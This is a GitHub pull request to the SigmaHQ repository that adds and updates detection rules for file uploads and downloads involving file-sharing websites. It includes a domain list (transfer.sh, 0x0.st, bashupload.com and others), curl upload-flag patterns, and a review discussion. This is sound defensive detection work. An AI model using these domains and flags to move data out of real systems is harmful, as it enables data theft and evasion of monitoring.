Skip to content

update: suspicious file activity related to file sharing websites #5574

Open
swachchhanda000 wants to merge 5 commits intoSigmaHQ:masterfrom
swachchhanda000:curl_bashupload
Open

update: suspicious file activity related to file sharing websites #5574
swachchhanda000 wants to merge 5 commits intoSigmaHQ:masterfrom
swachchhanda000:curl_bashupload

Conversation

@swachchhanda000
Copy link
Collaborator

Summary of the Pull Request

Changelog

new - Curl File Upload To File Sharing Websites
update - Suspicious Remote AppX Package Locations - add more file sharing domains
update - BITS Transfer Job Download From File Sharing Domains - add more file sharing domains
update - Suspicious File Download From File Sharing Websites - File Stream - add more file sharing domains
update - Unusual File Download From File Sharing Websites - File Stream - add more file sharing domains
update - New Connection Initiated To Potential Dead Drop Resolver Domain - add more file sharing domains
update - Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder - add more file sharing domains
update - Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location - add more file sharing domains
update - Suspicious Download From File-Sharing Website Via Bitsadmin - add more file sharing domains
update - Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE - add more file sharing domains
update - Suspicious File Download From File Sharing Domain Via Curl.EXE - add more file sharing domains
update - Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE - add more file sharing domains
update - Suspicious File Download From File Sharing Domain Via Wget.EXE - add more file sharing domains

Example Log Event

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

@github-actions github-actions bot added Rules Windows Pull request add/update windows related rules labels Aug 1, 2025
Comment on lines +21 to +33
- '0x0.st'
- 'bashupload.com'
- 'chunk.io'
- 'file.io'
- 'filebin.net'
- 'pastebin'
- 'send.firefox.com'
- 'temp.sh'
- 'transfer.sh'
- 'ufile.io'
- 'uploadfiles.io'
- 'wetransfer.com'
- 'x0.at'
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You literally just updated other lists that are bigger. Please add them

Copy link
Collaborator Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Well, I only added the domains that have documentation confirming curl support. Some domains are just for downloads, like cdn.discordapp.com. But I’ll check again to see if I missed any domains.

Copy link
Collaborator Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

And btw some of the pre-existing domains in these rules are dead/not-reachable like anonfiles.com, Should i remove them as well?

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Depends on their actual use i would say. If you still find samples on VT still communicating with them we keep in the proc creation related rules since it would highly mean they are bad.

@nasbench nasbench added the Author Input Required changes the require information from original author of the rules label Aug 29, 2025
@nasbench nasbench self-assigned this Aug 29, 2025
Copy link
Member

@nasbench nasbench left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Double check my comment before merging

@nasbench nasbench added Ready to Merge and removed 2nd Review Needed Author Input Required changes the require information from original author of the rules labels Nov 12, 2025
@nasbench nasbench added this to the Sigma-December-Release milestone Nov 12, 2025
- ' -X POST'
- ' --request POST '
- CommandLine|re:
- '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

we have the cased modified for it , but not sure many backend support it by now🐈‍⬛

Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

We should start using it imo. This should be handled by the backend/pySigma.

@phantinuss phantinuss added Review Needed The PR requires review and removed Ready to Merge labels Nov 21, 2025
phantinuss

This comment was marked as resolved.

@@ -21,8 +21,11 @@ detection:
EventID: 854
Path|contains:
- '.githubusercontent.com' # Includes both gists and github repositories / Michael Haag (idea)
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

All lists (such as here) that are the same and that should be maintained together should be linked in the metadata as "similar".

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

All the rule should add a related similar to at least one rule

@phantinuss phantinuss added the Author Input Required changes the require information from original author of the rules label Nov 21, 2025
Copy link
Member

@frack113 frack113 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Need to link the rules with like proc_creation_win_curl_upload_file_sharing_websites.yml

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

Author Input Required changes the require information from original author of the rules Review Needed The PR requires review Rules Windows Pull request add/update windows related rules

Projects

None yet

Development

Successfully merging this pull request may close these issues.

5 participants